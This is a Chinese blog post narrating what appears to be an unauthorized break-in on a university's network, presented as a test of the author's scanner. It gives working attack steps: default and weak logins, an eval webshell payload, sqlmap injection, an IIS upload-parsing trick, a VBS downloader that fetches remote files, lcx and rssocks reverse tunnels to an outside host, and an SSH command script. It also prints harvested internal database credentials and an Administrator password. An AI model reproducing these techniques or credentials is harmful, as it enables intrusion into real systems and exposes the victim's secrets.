iverson5

分享一次渗透过程

0x01前言

写了凤凰扫描器,想找找环境测试一下,就找了一个大学测试一下。

事实证明,凤凰扫描器还是具有不错的实战性的~

 

0x02 getshell

域名:xxxx.cn

  使用dnsenum 跑一下,发现有dns传输漏洞...不好打码,我就不贴图了

 

 

  开始找有漏洞的网站来进行突破。发现很多后台。测试弱口令登入,admin/admin admin/123456,admini/admin888,admin/admin123 这几个要是不成功的话,我一般就不会继续尝试了。

  一不小心进去一个后台,iis6.可以结合解析漏洞getshell。但是居然有waf。失败

 

  找找其它弱点。找到lib.xxxxx.cn 使用了汇文软件公司,在乌云发现许多漏洞。

  http://xxx.xxx.1.190:8080/admin/login.php

  默认密码是:huiwen_opac 拿这个这个登入就进去了。

    图片1.png

    这样插数据库配置文件,${@eval($_REQUEST[123])}成功插shell发现还是有狗,

    再尝试插shell,结果插坏了。。赶紧跑,渗透有风险。。。。

 

 

 

    继续找发现 

    http://software.xxxx.cn/ 看着就像有漏洞 是 iis7.5的 目测是win2008

    wcs扫到注入,用sqlmap跑一下。

    http://software.xxxx.cn/icexxxx/ShowNxxxxxxil.aspx?NewsId=2013623114310News

    是一个注入点。sa注入点,但是加--os-shell 不能执行系统命令

    注入出管理员的密码,进入后台。

    小插曲,发现有一个漂亮妹子照片:

    图片2.png

    真漂亮....有没有ps过啊???

    回到正题.....

    可以上传图片,不允许上传aspx,asp,php等等。截断也失败了,搞了半天搞不下。叫凤凰牛来帮忙,分分钟getshell。iis7.5解析漏洞,上传一个图片加上/.php就可以了。

    毕竟是凤凰牛。。。。

 

 

0x03 密码收集

Shell是php,居然是administrator权限。真好

图片3.png

收集密码:

本机运行wce.exe 老给杀,就没有抓密码了

 

mysql&mssql密码收集:

172.29.131.203;User Id=HL7DBUser;Password=HL7DBUser;" 

172.29.131.230;Initial Catalog=CollegeWeb;User ID=sa;Password=SOFTWAREdb"

 

服务器:

ip:172.29.131.210

Window2008

没有连接外网..这里坑到了,搞了许久弹不出来,后来才发现不能上网。。

 

 

目标转移到ip:172.29.131.230这个有sa权限的服务器上面。

连接上去,运气还是不错的,就是system权限&&可以连接外网

 

分享一次渗透过程 - IversOn5 - IversOn5 blog

分享一次渗透过程 - IversOn5 - IversOn5 blog


 

如何上传文件?

这个用小马哥一个wget脚本:

echo iLocal=LCase(Wscript.Arguments(1)) >>C:\\inetpub\\wwwroot\\wget.vbs

echo iRemote=LCase(Wscript.Arguments(0)) >>C:\\inetpub\\wwwroot\\wget.vbs

echo wscript.echo "[!]GET ",iRemote >>C:\\inetpub\\wwwroot\\wget.vbs

echo set xPost=CreateObject("Microsoft.XMLHTTP") >>C:\\inetpub\\wwwroot\\wget.vbs

echo xPost.Open "GET",iRemote,0 >>C:\\inetpub\\wwwroot\\wget.vbs

echo xPost.Send() >>C:\\inetpub\\wwwroot\\wget.vbs

echo set sGet=CreateObject("ADODB.Stream") >>C:\\inetpub\\wwwroot\\wget.vbs

echo sGet.Mode=3 >>C:\\inetpub\\wwwroot\\wget.vbs

echo sGet.Type=1 >>C:\\inetpub\\wwwroot\\wget.vbs

echo sGet.Open() >>C:\\inetpub\\wwwroot\\wget.vbs

echo sGet.Write xPost.ResponseBody >>C:\\inetpub\\wwwroot\\wget.vbs

echo sGet.SaveToFile iLocal,2 >>C:\\inetpub\\wwwroot\\wget.vbs

 

Usage:

cscript //nologo C:\\inetpub\\wwwroot\\wget.vbs 远程地址 保存文件名

 

这样就成功上传文件,抓本机密码:

UserName: Administrator

password: TREWQyuiop%$#@!67890+

 

0x04 又是一个坑

发现一个问题,发现172.29.131.230上面运行lcx.exe居然不能成功反弹。就是说,

我再外网服务器上面运行:lcx.exe -listen 1433 443。然后内网服务器运行lcx.exe -slave 外网ip 1433 127.0.0.1 3389。但是外网服务器没有接受到链接来连接1433的。。。卡了许久没有解决,想想,不一样要登入3389.直接在命令行下运行扫描器就好了。

于是先不管这个坎了!



0x05 拿出凤凰扫描器,扩大权限

这时候开始将原来的密码收集起来,写好配置文件。然后祭出凤凰扫描器。

新版的凤凰扫描器改了配置文件的方式,设置--p参数可以指定端口,还加了ms08067的扫描,vnc弱口令扫描,snmp弱口令扫描,pop3弱口令扫描等等,我还没有拿出来分享,因为还想完善rsync,oracle这两个模块的功能,等功能测试差不多了,再和大家分享。

[这里做一个求助:python如何登入rsync,不是通过调用shell命令来执行rsync命令。网上都是调用shell命令来扫rsync的匿名访问。我需要的是可以扫描rsync弱口令。我没有发现好用的库,有大牛做过相关的么?求帮助]

 

 

下面,直接在命令行下运行凤凰扫描器:

图片6.png 

速度还可以,现在看看扫描结果:

分享一次渗透过程 - IversOn5 - IversOn5 blog

分享一次渗透过程 - IversOn5 - IversOn5 blog

 

下面结果让我比较激动~~ 搞下了不少服务器

 

发现许多mysql数据库的root口令,还是不脱裤子了,我们是好孩子。

有时候服务器的价值远远比不上数据库里面数据的价值....

 

 

0x06 要如何玩下去

没有反弹3389出来,但是看到有三个linux的root权限服务器,所以还想继续玩玩linux,要是linux可以连接外网的话,那就太好了,可以安装ssock代理,然后进内网。

随手写了一个ssh.py可以执行命令的:

import paramiko 

import argparse

if __name__ == '__main__':

    parser = argparse.ArgumentParser(description='ssh commands author: wilson ')

    parser.add_argument('--ip',action="store",required=True,dest="ip",type=str,help='ip')

    parser.add_argument('--user',action="store",required=True,dest="username",type=str,help='username')

    parser.add_argument('--pass',action="store",required=True,dest="password",type=str,help='password')

    parser.add_argument("--port",action="store",required=False,dest="port",type=str,default='22',help='port')

    parser.add_argument("--cmd",action="store",required=False,dest="cmd",type=str,default='w',help='shell command')

    args = parser.parse_args()

    ip = args.ip

    port=int(args.port)

    cmd=args.cmd

    username=args.username

    password=args.password

    try:

        client = paramiko.SSHClient()

        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        client.connect(ip, port, username=username, password=password, timeout=10)

        stdin, stdout, stderr = client.exec_command(cmd)

        for std in stdout.readlines():

           print std,

        client.close()

    except Exception,e:

        print e

        pass


然后用pyinstaller转换为exe,这样就可以在cmd执行命令了:

图片9.png 

 

结果惊喜发现可以反弹出来:

图片10.png 

 

Good!!! 现在就是安装ssock了

相关资料在:

http://www.freebuf.com/articles/system/12182.html

大体原理就在内网服务器开启一个socket代理,如何在反弹到外网服务器上。和htran有些一样~

Usage:

外网服务器:

./rcsocks -vv -l 8088 -p 8089

8080是给内网肉鸡服务器连接的,8089是给渗透员socket5代理

内网服务器:

./rssocks -vv -s xxxxxxxxx:8089

渗透员:

配置好proxychains 就上吧:

图片11.png  

0x07 结语

关于为什么172.29.131.230可以上网,但是不能反弹出3389的问题:

问了p神,发现原来是防火墙问题,防火墙只允许内网服务器外链外面的80,8080这样的web端口。所以反弹时候要这样:lcx -slave xxxxx 80 127.0.0.1 3389

 

内网东西很多,非常考验渗透员的知识面,有些东西见都没有见过,你怎么知道这个是不是很重要,这个是不是突破点?所以还是需要去积累知识点,慢慢学习吧

 

只搞定一个小学院,内网还有很大的环境没有继续搞。不想继续玩了,要考试了,有空再继续玩吧~~

评论(1)
热度(2)

iverson5

© iverson5 | Powered by LOFTER